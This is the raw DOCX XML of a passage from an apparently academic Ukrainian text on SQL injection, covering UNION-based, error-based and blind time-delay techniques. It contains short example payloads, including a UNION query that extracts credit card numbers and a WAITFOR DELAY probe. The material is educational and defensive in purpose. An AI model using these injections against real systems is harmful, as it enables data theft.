      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="561E5125" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Якщо запит виконаний успішно і немає повідомлення про помилку, нападник припускає, що існує 10 або більше стовпців в таблиці. Але якщо додаток відображає помилку таку як </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00463519">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Unknown</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00463519">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>column</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> ‘10’ </w:t>
      </w:r>
      <w:r w:rsidRPr="00463519">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> ‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00463519">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>order</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00463519">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>clause</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>, тобто менше, ніж 10 стовпців в таблиці бази даних.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641BDBDF" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Оскільки нападник визначив</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> число стовпців, наступний крок це визначення типу стовпців використовуючи запит типу:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCED547" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">UNIONSELECT 1, </w:t>
      </w:r>
      <w:r w:rsidRPr="00463519">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00463519">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D8C168" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Якщо запит виконався успішно, атакуючий знає, що перший стовпець має тип </w:t>
      </w:r>
      <w:r w:rsidRPr="00463519">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>integer</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>, і може рухатись до вивчення типів інших стовпців.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E80B0F5" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Атакуючий запустить наступну UNION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQL ін’єкцію:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A11A2B7" w14:textId="2A4A953F" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00463519">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT Name, Phone,  Address FROM USERS  WHERE  Id=1 UNION ALL SELECT  creditCardNumber, 1, 1 FROM CreditCardTable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4C58EC" w14:textId="3A19A15B" w:rsidR="00524BA9" w:rsidRPr="00524BA9" w:rsidRDefault="00524BA9" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E017DF9" w14:textId="7A87FC47" w:rsidR="00524BA9" w:rsidRPr="00CE4163" w:rsidRDefault="00524BA9" w:rsidP="00524BA9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="1276"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C39A4">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4.1.4 </w:t>
      </w:r>
      <w:r w:rsidR="008B0B5B" w:rsidRPr="008B0B5B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Illegal</w:t>
      </w:r>
      <w:r w:rsidR="008B0B5B" w:rsidRPr="00CE4163">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="008B0B5B" w:rsidRPr="008B0B5B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>logically</w:t>
      </w:r>
      <w:r w:rsidR="008B0B5B" w:rsidRPr="00CE4163">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B0B5B" w:rsidRPr="008B0B5B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>incorrect</w:t>
      </w:r>
      <w:r w:rsidR="008B0B5B" w:rsidRPr="00CE4163">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B0B5B" w:rsidRPr="008B0B5B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF85F55" w14:textId="7CAA0A6D" w:rsidR="00524BA9" w:rsidRPr="008B0B5B" w:rsidRDefault="008B0B5B" w:rsidP="008B0B5B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B0B5B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>В цій атаці, атакуючий відправляє неправильний запит до бази даних навмисно генеруючи повідомлення про помилку, що може бути корисною у виконанні подальшої атаки. Ця атака має допомогти атакуючому вилучити структуру базової бази даних.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619BF5AF" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00B00F3C" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="372D250C" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="009E279C" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="993"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc516752131"/>
      <w:bookmarkStart w:id="53" w:name="_Toc30433115"/>
      <w:r w:rsidRPr="009E279C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="009E279C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Blind</w:t>
      </w:r>
      <w:r w:rsidRPr="009E279C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL-ін’єкція</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
      <w:bookmarkEnd w:id="53"/>
      <w:r w:rsidRPr="009E279C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F31B78" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E71A9D3" w14:textId="09EB84A0" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">В сліпій ін'єкції SQL, зловмисник володіє </w:t>
      </w:r>
      <w:r w:rsidRPr="000B4CF3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000B4CF3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>або</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000B4CF3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> запитанням до баз даних щоб побачити чи додаток вразливий до </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLi </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>[2</w:t>
      </w:r>
      <w:r w:rsidR="00FB6169" w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498CFEAF" w14:textId="02C3FA6B" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Звичайна </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> є часто можлива коли розробник використовує генерацію повідомлень про помилку коли сталася помилка в базі даних. Генерація цього повідомлення може розкривати конфіденційну інформацію або дати шлях атакуючому виконати SQL ін’єкцію. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41136327" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Проте, коли розробник відключає генерацію повідомлень для додатку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">то атакуючому буде складніше </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">виконати SQL-ін’єкцію. </w:t>
      </w:r>
      <w:r w:rsidRPr="004B7F6F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Blind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> використовується для доступу до конфіденційних даних або їх знищення. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCFB85F" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Зловмисники можуть викрасти дані, задаючи серію </w:t>
      </w:r>
      <w:r w:rsidRPr="004B7F6F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> чи </w:t>
      </w:r>
      <w:r w:rsidRPr="004B7F6F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> запитань за допомогою оператора SQL. Результат ін’єкції не видний для атакуючого. Цей процес споживає більше часу, оскільки база даних повинна генерувати новий стан для кожного знову відновленого біта.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE0C8E2" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="009E279C" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="1276"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E279C">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2.4.2.1 WAITFOR DELAY(</w:t>
      </w:r>
      <w:r w:rsidRPr="009E279C">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Yes or No Response</w:t>
      </w:r>
      <w:r w:rsidRPr="009E279C">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10878509" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Час затримки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> оцінює тимчасову затримку, яка відбувається у відповідь на справжні чи помилкові запити, надіслані в базу даних. </w:t>
      </w:r>
      <w:r w:rsidRPr="004B7F6F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Waitfor</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (зачекай на) зупиняє SQL Server на певний проміжок часу. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A07525B" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>На основі відповіді, зловмисник буде витягувати таку інформацію, як час підключення до бази даних, створювати інших користувачів, і запускати додаткові атаки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EF4DB7" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Крок 1: IF EXISTS(SELECT * FROM creditcard) WAITFOR DELAY ‘0:0:10’ -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08854B76" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
